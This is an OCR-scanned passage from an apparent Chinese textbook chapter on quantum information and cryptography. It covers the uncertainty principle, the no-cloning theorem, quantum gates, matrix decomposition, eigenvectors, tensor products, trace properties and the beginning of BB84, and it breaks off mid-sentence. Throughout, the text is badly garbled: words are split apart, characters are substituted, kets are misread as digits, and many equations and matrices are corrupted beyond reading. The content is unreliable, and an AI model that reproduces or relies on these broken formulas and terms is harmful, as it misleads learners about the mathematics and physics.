态 信息 的 每 一 步 演 变 ,线性 代数 的 么 正 变换 约束 着 可 逆 的 量子 态 
信息 计算 ; 量子 信息 的 传输 是 由 量子 通道 端点 上 量子 纠缠 集合 状 
态 的 变化 (微观 客体 的 关联 具有 非 局 域 的 性 质 , 且 可 以 延伸 到 很 


二 y 图 5.4 布 洛 赫 球 
远 的 距离 ) ,结果 信息 的 获取 便 是 在 得 到 输出 态 之 后 ,量子 计算 机 
对 输出 态 进行 一 定 的 测量 后 给 出 的 结果 。 
表 5.1 Bit 与 Qubit 的 对 比 
不 同 的 比特 
Bit Qubit 
区 别 项 

构成 双 稳 态 电子 线路 光子 极 化 状态 .电子 自 旋 状 态 等 

可 取 的 状态 0 或 1 10)、11) 和 al0) 十 B11》 

测量 影响 不 受 测量 ( 读 出 ) 影 响 车 处 于 释 加 态 , 受 测量 ( 读 出 ) 影 响 


5.3.4 海 森 堡 (Heisenberg) 测 不 准 原理 


量子 物理 与 经 典 物理 最 重要 的 区 别 可 以 概括 为 互补 性 和 相关 性 。 常 说 的 波 粒 二 象 性 就 
是 一 个 量子 体系 的 两 种 互补 属性 。 在 著名 的 杨 氏 双 缝 实验 中 ,如 果 想 确 知 发 出 的 某 光 子 通 
过 哪个 缝隙 ,来 探测 系统 的 微粒 性 ,结果 将 导致 无 法 观测 到 光 的 干涉 现象 ; 同样 ,如 果 想 观 
测 光 的 干涉 现象 ,在 测量 系统 的 波动 性 时 ,就 无 法 确定 光子 通过 的 路 径 。 在 量子 力学 里 , 任 
何 两 组 不 可 同时 测量 的 物理 量 都 是 共 轿 的 ,满足 互补 性 。 在 进行 观测 时 ,对 其 中 一 组 量 的 精 
确 测量 必然 导致 男 一 组 量 的 完全 不 确定 , 即 遵 循 量子 力学 的 基本 原理 一 一 Heisenberg 测 不 
准 原理 。 测 不 准 原理 描述 两 个 不 可 同时 精确 测量 的 变量 之 间 的 相互 影响 ,他 们 之 间 的 这 种 
相互 影响 可 用 数学 式 定量 描述 。 

根据 量子 力学 的 基本 假设 ,微观 体系 的 一 个 力学 量 用 一 个 线性 厄 米 算 符 表示 。 处 于 某 
一 给 定 状态 |y) 的 量子 系统 ,其 各 力学 量 并 不 总 是 取 确 定 值 。 例 如 力学 量 A ,假设 其 本 征 值 
为 a;, 对 应 的 本 征 态 为 |a;), 则 Alai) ==ai |ai)。 

那么 在 1y) 态 下 对 力学 量 A 进行 测量 得 到 取 值 a; 的 概率 是 (a; |y)?。 

定义 力学 量 A 在 态 |y) 中 的 平均 值 A: A=(y|Aly)。 

力学 量 A 在 态 | 内 中 的 不 确定 度 定义 为 AA ,满足 : 

(AA) :一 (w 一 人 = >) (| Ca mA) |a) a | 从 


Dy [oz 一 2 有 十 (有 3] | ai) la; | 从 


‘y |1 [LA — (A) | Y= A — A)’ 
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定义 力学 量 算 符 A 与 B 的 对 易 式 [A,B]==AB 一 BA, 则 力学 量 A 和 B 在 同一 量子 态 |y) 
下 的 不 确定 度 关系 为 : 


AAAB 之 去 15A,BJ| 


这 就 是 测 不 准 原 理 , 或 称 测 不 准 关系 。Heisenberg 测 不 准 原理 表明 ,微观 粒子 两 类 非 对 易 
可 观测 量 的 属性 是 互补 的 ,对 其 中 一 种 属性 的 精确 测量 必然 会 导致 其 互补 属性 的 不 确定 性 。 

由 于 和 加 性 , 式 |y) = 二 a10) 十 B11) 所 表示 的 量子 比特 可 能 以 概率 a? 处 于 10) 态 ,也 
可 能 以 概率 81? 处 于 11) 态 ,还 可 能 处 于 这 两 个 态 的 又 加 态 a10) 十 B11) ,但 无 法 知道 该 量 
子 比 特 具体 处 于 哪 一 个 状态 ,要 获得 确切 的 结果 就 必须 测量 该 量子 比特 。 而 量子 测量 与 测 
量 基 的 选取 有 关 , 若 测量 基 选 得 不 合适 ,测量 不 能 给 出 精确 结果 。 例 如 ,用 基 矢 |0) 和 |1) 构 
成 的 测量 基 |0〉; 《0| 和 |1)(1| 测 量 量子 比特 1y) = 二 a10) 十 B11) ,得 到 的 结果 要 么 是 10) ,要 么 是 
11) ,但 不 能 完全 确定 1y)。 因 为 振幅 和 相位 是 一 对 测 不 准 量 , 一 旦 振幅 完全 确定 , 则 相位 完 
全 不 确定 ,因而 不 能 完全 确定 1y)。 量 子 比 特 的 这 种 测 不 准 性 是 量子 密码 的 基石 之 一 。 


5.3.5 量子 不 可 克隆 定理 


Wootters 和 Zurek 曾 于 1982 年 在 (自然 } 杂 志 上 撰文 提出 如 下 问题 : 是 否 存在 一 种 物 
理 过 程 实现 对 一 个 未 知 量子 态 的 精确 复制 使 得 每 个 复制 态 与 初始 量子 态 完全 相同 呢 ? 
Wootters 和 Zurek 证 明 量 子 力学 的 线性 特性 禁止 这 样 的 复制 这 就 是 量子 不 可 复制 定理 的 
最 初 表述 。 

量子 不 可 克隆 定理 的 证 据 很 简单 以 两 态 量子 系统 为 例 其 基 矢 选 为 0 和 1, 设 :代表 此 二 
维 空间 。 任 意 量子 态 量 子 克 隆 过 程 可 以 表示 为 : 1s)1Q), 一 |s)|s)1Q'),, 式 中 右 端 |s) 1s) 表 
示 初 始 模 和 复制 均 处 于 |s) 态 ,|1Q), 和 |Q'), 分 别 为 装置 在 复制 前 后 的 量子 态 , 复 制 后 装置 
的 量子 态 |1Q'), 可 能 依赖 于 输入 态 1s)。 若 对 1s) 1Q). 一 1s) 1s) 1Q'), 式 进 行 变换 ,那么 对 基 
矢 10) 和 |1) 应 分 别 有 : 

10) | Q)。 —=|0)10 | Qe)。 | 1) 1:—=|1)11)|Q), (5-6) 

现 假设 |;) 是 一 个 任意 的 释 加 态 即 : 1s) = 二 a10) 十 811), lal 十 |B|?*==1, 由 式 (5-6) 及 量 
子 操作 的 线性 特征 不 难 导 出 在 操作 后 1;) 将 演变 为 

| 5) |1Q) = (a|0)+B|1) |Q).—>al|o0)|0)|Q)+B8|1) |1)|Q), 

若 复 制 机 的 态 1Qs), 与 1Q1); 不 人 恒 等 ,那么 上 式 给 出 的 初始 模 和 复制 模 均 处 于 10) 与 
11) 的 混合 态 ; 若 复 制 机 的 态 1Q); 与 1Q1); 恒 等 , 则 初始 模 和 复制 模 将 处 于 纠缠 态 a|0》 
10) 十 B811)11)。 无论 哪 种 情况 ,初始 模 和 复制 模 都 不 可 能 处 于 直 积 态 |s) 1s)。 因 此 ,如 果 一 
个 量子 复制 机 能 精确 复制 态 10) 和 |1), 则 它 不 可 能 复制 两 态 的 又 加 态 1s) ,这 就 是 量子 不 可 
克隆 定理 的 内 容 。 

量子 态 不 可 克隆 是 量子 力学 的 固有 特性 , 它 设置 了 一 个 不 可 逾越 的 界限 。 量 子 不 可 克 
隆 定理 是 量子 信息 科学 的 重要 理论 基础 之 一 。 量 子 信息 是 以 量子 态 为 信息 载体 (信息 单 
元 )。 量 子 态 不 可 精确 复制 是 量子 密码 术 的 重要 前 提 , 它 确保 了 量子 密码 的 安全 性 。 近 年 来 
人 们 对 它 做 了 进一步 的 研究 ,揭示 出 更 丰富 的 物理 内 涵 。 

量子 态 不 可 克隆 和 生物 大 分 子 可 以 克隆 的 对 比 : 

(1) 生物 克隆 。 生 物 大 分 子 的 克隆 一 一 是 原子 (分 子 ) 排 列 顺序 的 克隆 ,是 硬件 克隆 ,经 


典 克 隆 。 

(2) 量子 克隆 。 软 硬件 的 全 部 信息 的 克隆 。 量 子 克隆 的 不 可 能 意味 着 : 试图 复制 出 不 
仅 外 瑶 .体征 相同 ,而且 连 知识 .记忆 、` 思 想 .性格 等 都 完 完 全 全 相同 的 人 ,量子 力学 原理 是 不 
容许 的 。 


5.3.6 量子 信息 与 线性 代数 


1. 内 积 、 外 积 与 Hilbert 空间 
定义 5.1 内 积 。 


在 n 维 复 矢 量 空间 中 , 设 矢 量 |u) 一 林 1) 二 | |, 则 |w) 和 |w) 的 内 积 定义 为 


Un Wn 
WI 
(lay = 0 0 (5-7) 
Wn 


其 中 vu 表示 复数 w 的 复 共 思 e。 
由 定义 5.1, 可 以 顺便 得 出 与 右 和 撩 相对 应 的 左 矢 的 定义 。 
定义 5.2 左 矢 。 
vb 


vz 


在 mn 维 复 矢 量 空间 中 , 设 矢 量 |u) 一 , 则 左 矢 人 | 定义 为 


Un 
vw|= (WW v2 sv ) (5-8) 
事实 上 ,定义 5.1 与 定义 5.2 是 可 以 互相 导出 的 。 
Dirac 符号 左 矢 与 右 矢 又 可 以 分 别 成 为 刁 矢 和 刃 矢 。 在 英文 中 有 时 则 分 别 叫 Bra 和 
Ke。 本 文中 则 统一 使 用 左 矢 与 右 矢 的 叫 法 。 
量子 信息 学 中 经 常 提 到 的 就 是 Hilbert 空间 。 在 量子 计算 与 量子 信息 中 遇 到 的 有 限 维 
复 矢 量 空间 类 中 ,可 以 认为 Hilbert 空间 与 内 积 空间 是 等 同 的 。 本 节 将 不 显著 区 分 这 两 个 
定义 5.3 外 积 。 
Ul wi 


2 


在 维 复 矢量 空间 中 , 设 矢量 | 几 一 | |,1w)=| “|, 则 1v) 和 |w) 的 外 积 定义 为 


Un Wn 
WI 
ob l= | [evr so8 ,sv ) (5-9) | 第 
5 
Wn 章 
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内 积 是 一 个 标量 (是 一 个 “ 数 ”) ,而 外 积 则 是 一 个 和 矩阵。 如果 矢 量 1v) 和 |w) 的 内 积 为 0， 
即 (vlw) 二 0, 则 称 |v) 和 |w) 是 正 交 的 (orthogonal) 。 如 果 |v) 同 它 自身 的 内 积 为 1, 即 (v1v) 二 
1, 则 称 是 1v) 单 位 矢量 ,或 者 说 是 归 一 化 的 (normalised 或 normalized)。 一 组 以 i 为 索引 的 
矢量 ,如 果 每 个 矢量 都 是 归 一 化 的 , 且 不 同和 撩 量 之 间 相 互 正 交 | 让 , 称 为 正 交 归 一 
(othonormal) 矢 量 组 。 

2. 量子 门 与 么 正 变换 

从 硬件 上 说 ,经 典 计算 机 的 计算 单元 都 是 由 一 个 个 门 电路 (例如 与 或,. 非 等 ) 组 成 的 。 
量子 计算 机 与 之 类 似 , 也 是 有 很 多 的 量子 门 组 成 的 ,以 此 来 完成 各 种 计算 任务 。 

事实 上 ,对 于 量子 信息 来 说 ,可 以 认为 量子 门 是 由 一 个 个 么 正 变换 (unitary 
transformation) 来 实现 的 。 在 复 矢量 空间 上 的 任何 线性 变换 都 可 以 用 一 个 矩阵 (或 者 称 算 
子 ) 来 描述 。 设 M* 是 M 的 共 扼 转 置 矩 阵 , 如 果 有 M” M==1, 则 称 M 是 么 正 矩 阵 , 变 换 M 称 
为 么 正 变换 。 

Hilbert 空间 上 的 任何 么 正 变换 都 是 合法 的 量子 变换 , 反 过 来 也 成 立 , 即 Hilbert 空间 
上 任何 合法 的 量子 变换 都 必须 是 么 正 变换 。 

对 于 单 量子 比特 ,有 4 个 常用 的 量子 门 : I、X、Y 和 Z, 它 们 通常 叫做 泡 利 矩阵 
(Pauhmatrices) ,分 别 定义 为 


1 0 
| | (5-10) 
0 1 
0 1 
x=“=| ] (5-11) 
1 0 
0 =# 
r==|: ] (5-12》 
芝 0 
1 0 
z=“=| | (5-13) 
| 


其 中 的 区 门 又 叫 非 门 或 求 非 变换 , 它 的 作用 是 使 10 和 11 翻 转 , 即 10)-11 和 11) 一 
10 ,因为 对 于 处 于 态 19) 一 al0》 二 Bl 一 的 音量 子 比 特 来 说 ,车 将 X 门 作用 于 其 上 ,有 ， 


cf -人 -os 


除了 泡 利和 矩阵 ,还 有 一 个 非常 重要 和 常用 的 单 量 子 比特 门 一 -Hadamard 门 。 
Hadamard 门 的 作用 是 10) 一 去 (10) 十 11)),11) 一 去 (10) 一 1) )。Hadamard 门 或 简称 为 


1(1 |] 
a 一 1 


更 一 般 地 ,对 于 任意 的 单 量子 比特 门 . 有 U(a,$) 门 ,如 表 5.2 所 示 。 


五 门 的 矩阵 表示 为 


表 5.2 U(a,$) 门 


Ul(a,$) 门 
输入 输出 
10) cosa|0) 一 ieysin al1) 
ji cosa|1)—ie *sin c|0》 


U(a,$) 门 的 具体 物理 实现 我 们 不 需要 了 解 , 只 要 知道 下 面 等 式 即 可 : 


U(a,$) 一 ( 


Cosa — isinae' 
(5-14) 


— isinae cosa 


例如 对 于 非 门 .有 (= 各 $=0]=o.= (1 ]- 


对 于 双 量 子 比 特 , 我 们 只 介绍 一 个 最 为 重要 的 受 控 非 门 (Controlled-NOT), 简 称 控 非 
门 或 C-NOT 门 。 它 的 矩阵 表示 为 


et 
SO oP~“o 
= © © © 
SS 


0 0 
C-NOT 门 作 用 在 2 个 量子 比特 上 ,其 中 第 一 个 量子 比特 叫 控制 比特 ,第 二 个 比特 叫 工 
作 比 特 ,C-NOT 门 的 工作 情况 如 表 5. 3 所 示 。 


表 5.3 C-NOT 门 的 真 值 表 
C-NOT 
输入 输出 
控制 比特 工作 比特 控制 比特 工作 比特 
10) 10) 10》 10) 
10》 I 10》 11》 
11》 10) 11》 11》 
11》 11》 (a 10》 


可 见 , 当 控制 比特 为 10) 时 ,C-NOT 门 作 用 后 ,工作 比特 保持 不 变 ; 当 控 制 比特 为 |1》 
时 ,C-NOT 门 作用 后 ,工作 比特 反 转 。 多 量子 比特 门 是 可 以 由 单 量子 比特 门 与 C-NOT 门 
的 组 合 来 实现 ,此 处 不 再 著述 。 

定理 5.1 Deutsch 定理 。 

令 U 是 任意 d 维 么 正和 矩阵 , 则 避 可 以 被 分 解 为 2d? 一 d 个 二 维 么 正 矩 阵 的 乘积 (它们 均 
是 分 别 作 用 于 各 自 一 对 基态 所 张 成 的 二 维 子 空间 , 即 它们 中 每 个 的 各 自 余 空间 均 不 变 ) 。 

任何 作用 在 一 组 量子 比特 上 的 么 正 变换 均 可 以 用 一 系列 单 量子 比特 量子 门 U(a,8) 和 
双 量 子 比 特 C-NOT 门 依次 作用 来 实现 。 

证 明 : 取 定 基 矢 { |e1),|es),…,|es)} 所 张 成 的 a 维 空间 。 

首先 ,可 证 用 (d 一 1]) 个 2 维 么 正 变换 将 


贡 on 站 
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a 1 
Ba 三 | @) 
aa 0 
为 此 , 取 2 维 么 正 变换 A,， 
4 人 | (5-15) 
V| ai 下 十 | as 上 as 一 aa 


它 仅 作用 于 子 空间 {le ,|e )} ,对 相应 的 余 空间 为 恒 等 变换 ,于 是 有 : 


本 2 
上 网 站 | 人 | (5-16) 
a2 0 


再 取 2 维 么 正 变换 A;， 
var [Fias | 5 
we 1 | Ta To a ee 
VT aa tla [tlas [: as 一 VTa 正二 [az 
它 仅 对 子 空间 {ei) ,|es)} 作 用 ,对 相应 的 余 空 间 为 恒 等 变 换 , 于 是 有 : 
“| Ta en)-| Ta | Es 
Q3 0 
如 此 继续 下 去 ,可 得 : 
QI 】 
Q2 0 
Aa'*A:A2| . Lar 十 |as 1 证 十 [as | (5-19) 
Gd 0 


其 次 , 令 |81) ,| 加 ), ,| 加 ?是 任意 给 定 的 gd 维 么 正 矩 阵 x 的 本 征 矢量 (它们 彼此 正 交 ), 相 
应 本 征 值 分 别 为 
Eih ,eite ,oo ,Ei 
将 上 面 的 步骤 用 于 | 加之 后 再 乘 以 ew ,就 是 说 ， 
| 页) 一 e |e) 
然后 将 |e) 道 映射 为 |81) ,于 是 有 : 
en 0 
2 | 
Cy 1.…(42 ) 1 卫 FM. | b> 二 en | $1) (5-20) 
1 
这 里 共有 (4d 一 1) 十 1 十 (d 一 1) 二 2d 一 1 个 2 维 么 正 变换 。 对 每 个 本 征 矢量 |$;) 都 重复 如 此 
做 法 ,并 注意 ,由 于 | 加? 和 | 点)G 一 2,…,d) 彼 此 正 交 ,因而 
en 0 
(A (AD a A -AD | 8) = | $0 = 2,.°,d) (5-21) 
1 
这 是 由 于 列 矢量 A 四 …A5? 1$8;〉( 关 1) 中 的 第 一 个 元 素 必定 为 零 ,而 为 零 则 是 因为 此 


列 矢 量 必须 和 4 吧 …4 吕 | 页 ?一 |el) 正 交 。 
于 是 U 就 被 表示 成 为 4(2d 一 1) 个 2 维 么 正 变换 的 乘积 ,注意 ,由 于 U 被 分 解 为 d 的 多 
项 式 个 运算 , 按 下 面 说 法 ,U 的 这 种 分 解 是 有 效 算法 。 
显然 易于 证 明 ( 这 里 略 去 ) ,任何 作用 在 一 组 量子 比特 上 的 么 正 变换 ,或 者 更 明确 些 , 任 
何 二 维 么 正 变换 均 可 以 用 一 系列 U(c,%) 单 量子 门 和 C-NOT 双 量 子 门 的 依次 作用 来 实现 。 
量子 网 络 是 经 典 网 络 的 自然 推广 ,其 中 逻辑 门 用 量子 门 代替 。 
3. 本 征 值 和 本 征 矢 
本 征 值 和 本 征 矢 对 于 研究 量子 力学 相当 有 用 。 对 于 线性 算 子 或 矩阵 4 来 说 ,如 果 存 在 
非 零 矢量 |u) ,使 得 : 
Alv)=Alv) (5-22) 
则 称 复数 4 是 A 对 应 于 矢量 1v) 的 本 征 值 (eigenvalue) ,1v) 称 为 属于 本 征 值 4 的 本 征 矢量 
(eigenvector) ,简称 本 征 矢 。 
在 线性 代数 中 ,关于 本 征 值 和 本 征 和 撩 有 以 下 几 条 性 质 : 
(1) 车 |v) 是 属于 本 征 值 4 的 本 征 矢 , 则 对 任 一 非 零 复 数 ww| 几 也 是 属于 本 征 值 的 本 
征 矢 。 
(2) 车 |v) 和 |w) 是 A 的 属于 本 征 值 4 的 本 征 和 撩 , 则 当 |v) 十 |w) 为 非 零 撩 量 时 ,1v) 十 |w) 
也 是 A 的 属于 4 的 本 征 矢 。 
(3) 属于 不 同 本 征 值 的 本 征 矢 线性 无 关 。 
证 明 (1) 因为 y1v) 是 非 零 撩 量 , 且 
A(pg10))=pA Nw =pA |v =A(p1 0) (5-23) 
(2) 由 本 征 值 与 本 征 矢 的 定义 有 
A( 几 十 lo))=A| 罗 二 Alo)= 一 人 | 几 二 lo) 一 AIw 二 lo) (5-24) 
由 性 质 (1) 和 (2) 还 可 以 得 出 推论 , 即 属 于 同一 个 本 征 值 的 本 征 矢 的 非 零 线性 组 合 仍 为 
属于 入 的 本 征 矢 。 更 进一步 , 若 |u) ,lu ,…,|u). 是 同属 于 入 的 本 征 矢 , 则 对 于 复数 pi， 
jy 来 说 , 非 零 线性 组 合 让 lu 十 me 1v)z 十 … 十 ps 1v), 仍 为 属于 、 的 本 征 矢 。 
(3) 可 以 用 数学 归纳 法 来 证 明 。 
设 Ni ,X,…,x 为 A 的 互 不 相同 的 本 征 值 ,|u ,1v)s，…,1v)4 为 对 应 于 它们 的 本 征 矢 。 
用 归纳 法 , 当 k=1 时 ,结论 显然 成 立 。 假 设 k 一 1 时 命题 成 立 , 下 面 证 明 对 于 k 命题 也 成 立 。 
假设 存在 复数 pn ,ps，… ,pr 使 得 : 


Au 二 pa 1 vz 十 … 十 px 1 v= 二 0 (5-25) 

用 和 乘 式 (5-25) 两 边 得 : 
PR (5-26) 

再 用 A 左 乘 式 (5-26) ,得 : 
pA | ui 十 pahz | us 十 … 十 ps | v=0 (5-27) 


由 式 (5-26) 和 式 (5-27) 可 得 : 
pM Cm—A) | oa 十 me( 一 iz)| os 十 十 M( 一 Mi) 一 0 (5-28) 
由 归纳 法 假设 知 , 必 有 : 


pM —N)=0,7 =1,2,.…,k—1 (5-29) 
而 已 知 和 4 一 了 关 0, 于 是 必 有 jn 一 pj2 二 … 二 p_i 二 0, 从 而 由 式 (8-25) 又 有 jp 1v)t 二 0, 又 因为 
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1v) 关 0, 所 以 只 有 px 二 0。 由 此 ,10)1 ,1v)a，,… ,|v)4 线性 无 关 。 


对 应 于 一 个 本 征 值 的 本 征 空间 (eigenspace) 是 以 、 为 本 征 值 的 矢量 的 集合 , 它 是 算 子 
A 在 其 上 作用 的 矢量 空间 的 子 空间 。 矢 量 空间 上 A 的 对 角 表 示 是 具有 形式 A 一 >) Ni)(i 
| 的 一 个 表示 ,其 中 矢量 组 |i) 是 A 的 本 征 矢 构成 的 正 交 归 一 的 矢量 组 ,对 应 的 本 征 值 为 Ni 。 


如 果 一 个 算 子 有 一 个 对 角 表 示 , 则 称 该 算 子 是 可 对 角 化 的 。 
4. 矩阵 的 相似 与 对 角 化 
首先 我 们 给 出 矩阵 相似 的 定义 : 


定义 5.4 对 于 两 个 复 和 矩阵 4 和 B, 如 果 存 在 一 个 阶 可 道 阵 T, 使 得 B= 二 TAT, 则 称 


A 和 B 是 相似 的 。 
相似 矩阵 具有 很 多 良好 的 性 质 , 下 面 不 加 证 明 地 给 出 : 
(1) 相似 矩阵 具有 相同 的 行列 式 , 即 
det A= detB 
(2) 相似 矩阵 具有 相同 的 秩 , 即 
rank 4 一 rank B 
(3) 相似 矩阵 具有 相同 的 本 征 值 。 
一 般 地 ,对 于 矩阵 与 对 角 阵 相似 的 情况 ,有 如 下 的 定理 ， 


定理 5.2 nn 阶 方 阵 A 相似 于 对 角 阵 的 充 要 条 件 是 : A 有 n 个 线性 无 关 的 本 征 矢 。 


证 明 : 首先 证 明 必 要 性 , 设 
和 


其 中 i 是 T 的 列 矢量 
A 


2 
Al(tistz ss ts )= (bist ,ts ) 


“a (5-30) 
(5-31) 

A 
(5-32) 


vn: 则 有 : 


(5-33) 


即 有 : 
At;=X; 
因此 当 A 相似 于 对 角 阵 时 ,可逆 阵 工 的 ?个 线性 无 关 的 列 矢 量 是 由 4 的 nn 个 本 征 矢 排 
列 而 成 的 。 
下 面 证 明 充 分 性 。 设 A 有 个 线性 无 关 的 本 征 矢 wo ，,… 
和 ii 一 Ai 
我 们 就 用 wm ,证 ,省 作为 可 逆 阵 T 的 列 矢 量 , 于 是 有 : 
A 
As 


即 矩阵 A 相似 于 对 角 阵 。 
5. 复合 系统 和 张 量 积 


到 目前 为 止 ,我 们 讨论 的 都 是 单个 物理 系统 的 情况 。 对 于 两 个 或 以 上 的 物理 系统 组 成 


的 复合 量子 系统 ,如 何 描述 它 的 状态 ? 


通常 ,在 量子 信息 技术 中 ,采用 张 量 积 (Tensor Products) 的 方式 来 描述 。 张 量 积 将 若 
干 个 小 的 矢量 空间 合 在 一 起 ,构成 一 个 更 大 的 矢量 空间 。 考 虑 维 数 分 别 为 * 和 + 上 的 空间 S 
和 了 , 则 S 中 的 |v) 和 工 中 的 任意 矢量 |w) 的 张 量 积 可 以 表示 为 1v)@1w) 二 1v)1w) 二 |vw)， 


且 |vw) 的 维 数 为 st。 


如 果 以 矩阵 形式 表示 , 设 1v) 三 


U1 
|v) 因 | o) = 


Un 


Un 


: 风 


则 1v) 和 |w) 的 张 量 的 积 是 


Vw 
V2 wz 
Ul wn 
Vz wl 


U2 2 


U2 Wn 


UnWn 


(5-34) 


更 一 般 地 , 设 A 是 mXn 的 矩阵 ,B 是 pXg 的 和 矩阵 , 则 4 与 B 的 张 量 积 可 以 用 和 矩阵 表示 为 


AunB AwB AiB 
po nh MuB ha 
AmnB AmB … A。wB 
例如 , 泡 利和 矩阵 X 和 YY 的 张 量 积 为 

0 0 0 一 ii 
0 0 1 0 
SO 0—i0o 1 
1 0 0 0 

易于 验证 下 面 的 几 个 关于 张 量 积 的 几 个 性 质 : 


(1) (4 十 B)CGC=A4AGC+BGQC 
(2) AQBGQC= (A4®B)AOC=AO BOOC) 
(3) A®BzBOA 


(5-35) 
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张 量 积 在 量子 信息 中 的 最 大 作用 就 是 当 其 用 于 表达 量子 复合 系统 的 时 候 。 对 于 此 ,给 
出 了 如 下 的 量子 力学 假设 : 

假设 5.1 复合 物理 系统 的 状态 空间 是 分 物理 系统 状态 空间 的 张 量 积 , 若 将 分 系统 编 
号 为 1~n, 系 统 i 的 状态 被 置 为 |g;) , 则 整个 系统 的 总 状态 为 |p.)@ 192)@…@|9,|。 

6. 一 个 重要 的 函数 

对 于 一 个 矩阵 来 说 , 它 的 Trace( 译 为 * 迹 ”) 定 义 为 该 矩阵 的 主 对 角 线 上 所 有 的 元 素 之 


Trace 


和 , 即 对 于 yx 的 矩阵 A ,定义 Tr(A) 一 》) A, 。 不 论 是 在 量子 信息 里 ,还 是 在 线性 代数 
i=1 
中 ,Trace 都 是 一 个 相当 重要 的 函数 。 对 于 Trace 来 说 , 它 具有 以 下 的 性 质 : 


(1) Tr(zA)=zTr(A) (5-39) 
(2) Tr(AB)=Tr(BA) (5-40) 
(3) Tr(A+B)=Tr(A)+Tr(B) (5-41) 
(4) Tr(U*AU)=Tr(A) 其 中 UU 是 么 正 矩 阵 (5-42) 
(5) Tr(Alg) (pg|)= (plAly) (5-43) 
(6) 对 于 相似 矩阵 4 和 B, 有 Tr(4) 二 Tr(B) (5-44) 


证 明 性 质 (1) 和 (3) 表 明 Trace 是 线性 的 ,性 质 (2) 表 明 Trace 具有 循环 性 ,这 3 个 性 
质 的 证 明 相当 简单 ,只 要 拥有 基本 的 线性 代数 知识 即 可 很 容易 地 推出 。 

对 于 性 质 (4) ,利用 性 质 (2) 的 结论 ,有 Tr(U"4U) 一 Tr(UU 4) 一 Tr(4)。 

性 质 (4) 表 明 Trace 在 么 正 相似 变换 下 保持 不 变 , 该 性 质保 证 了 Trace 是 定义 良好 的 。 

下 面 重点 证 明 性 质 (5)。 


令 Alyp)=|w), 且 |v) ,|w) .让 则 


TAA IY) (py De Tilow) (v= Ted Kor yor” vst 


Wn 
一 ou 二 wavs” 十 wnvn” 
=(pg|w = (pg|Al9y) 
值得 一 提 的 是 性 质 (5) 对 于 计算 一 个 矩阵 的 Trace 相当 有 用 ,以 后 会 经 常用 到 式 (5-43)。 
(6) 由 5. 3.6 节 第 4 部 分 中 的 性 质 (3)( 相 似 矩 阵 具 有 相同 的 本 征 值 ) 可 直接 得 出 此 结论 。 


5.4 量子 密码 基础 理论 : 量子 密码 学 基础 


5.4.1 量子 密码 学 概述 


量子 力学 和 密码 学 的 结合 ,诞生 了 量子 密码 学 , 它 可 完成 仅仅 由 传统 数学 无 法 完成 的 完 
善 保 密 系 统 。 量 子 密码 学 是 在 量子 理论 基础 上 提出 了 一 种 全 新 的 安全 通信 系统 , 它 的 基本 


规律 将 从 根本 上 解决 经 典 密码 某 些 无 法 解决 的 问题 。 在 这 些 规 律 中 ,对 量子 密码 学 起 关键 
作用 的 是 测 不 准 原理 , 即 测量 量子 系统 时 通常 会 对 该 系统 产生 干扰 ,并 产生 出 关于 该 系统 测 
量 前 状态 的 不 完整 信息 ,因此 任何 对 于 量子 信道 进行 监测 的 努力 都 会 以 某 种 检测 的 方式 干 
扰 在 此 信道 中 传输 的 信息 。 

量子 密码 由 哥伦比亚 大 学 的 年 轻 学 者 S$，Wiesner 于 1969 年 在 一 篇 题 为 ( 苍 编码 ) 的 
论文 中 首先 提出 来 的 。 该 文 提出 了 一 个 全 新 的 概念 , 即 利用 量子 比特 的 不 可 克隆 性 来 制造 
不 可 伪造 的 “量子 钞票 ”。 但 是 这 个 设想 需要 长 时 间 保 存量 子 比 特 ,而 在 当时 量子 比特 的 存 
储 时 间 极 短 ,实现 “量子 钞票 "简直 就 是 天 方 夜 谭 , 该 想法 没有 引起 人 们 的 注意 。 

20 世纪 80 年 代 初 ,IBM 公司 科学 家 C. H. Bennett 和 加 拿 大 Montreal 大 学 密码 学 家 
G. Brassard 重新 研究 了 Wiesner 的 思想 ,发 现 把 量子 比特 用 于 传输 信息 比 量子 比特 的 存储 
更 重要 。1984 年 ,Bennett 和 Brassard 提出 了 第 一 个 量子 密码 方案 一 一 BB84 方案 ,该 方案 
在 理论 上 能 保证 信息 传输 的 无 条 件 安全 性 , 它 利 用 量子 力学 的 测 不 准 原 理 和 量子 不 可 克隆 
定理 ,通过 公开 信道 传输 量子 比特 ,实时 产生 密 钥 ,并 且 任 何 的 窃听 行为 都 能 轻而易举 地 被 
检测 出 来 。 该 设想 可 表述 为 : 由 电磁 能 产生 的 量子 (如 光子 ) 可 以 充当 为 密码 解码 的 一 次 性 
使 用 的 “钥匙 ”>。 每 个 量子 代表 比特 含量 的 信息 ,量子 的 极 化 方式 ( 波 的 运动 方向 ) 代 表 数 字 
化 信息 的 数码 。 量 子 一 般 能 以 四 种 方式 极 化 ,水 平 的 和 垂直 的 , 互 为 一 组 ; 两 条 对 角 线 的 ， 
也 是 互 为 一 组 。 代 表 量 子 信息 的 0 和 1 就 由 这 些 彼此 正 交 的 偏振 态 来 表示 。 

这 样 ,每 发 送出 一 串 量子 ,就 代表 一 组 数字 化 信息 。 而 每 次 只 送出 一 个 量子 ,就 可 以 有 
效 地 排除 黑客 窃取 更 多 的 “量子 密码 ”的 可 能 性 。 例 如 .有 一 个 窃听 者 开始 向 “量子 密码 ” 进 
行窃 听 , 他 必须 先 用 接收 设施 从 发 射出 的 一 连 串 量子 中 吸 去 一 个 量子 。 这 时 ,发 射 密码 的 一 
方 就 会 发 现 发 射出 的 量子 流出 现 了 空格 。 于 是 ,为 了 填补 这 个 空格 ,窃听 者 不 得 不 青 发 射 一 
个 量子 。 但 是 ,由 于 量子 密码 是 利用 量子 的 极 化 方式 编排 密码 的 ,根据 量子 力学 原理 ,同时 
检测 出 量子 的 4 种 极 化 方式 是 完全 不 可 能 的 ,窃听 者 不 得 不 根据 自己 的 猜测 随便 填补 一 个 
量子 ,这 个 量子 由 于 极 化 方式 的 不 同 很 快 就 会 被 发 现 。 迄 今 为 止 ,BB84 方案 是 被 使 用 得 最 
多 的 量子 密码 方案 ,这 样 一 个 简单 却 具有 良好 安全 性 能 的 密码 方案 引起 了 密码 学 界 的 极 
大 关注 。 从 此 ,量子 密码 引起 了 国际 物理 界 和 密码 学 界 的 高 度 重视 ,开始 对 量子 密码 展 
开 了 丰富 多 彩 的 研究 ,取得 了 大 量 的 研究 成 果 。BB84 方案 流程 如 图 5.5 所 示 , 实 例如 
表 5.4 所 示 。 

1989 年 ,世界 上 第 一 个 量子 密 钥 分 发 (Quantum Key Distribution ) 实验 在 IBM 公司 
Thomas 实验 室 获得 成 功 ,该 实验 采用 BB84 协议 ,其 实验 通信 距离 在 自由 空间 中 虽然 仅 有 
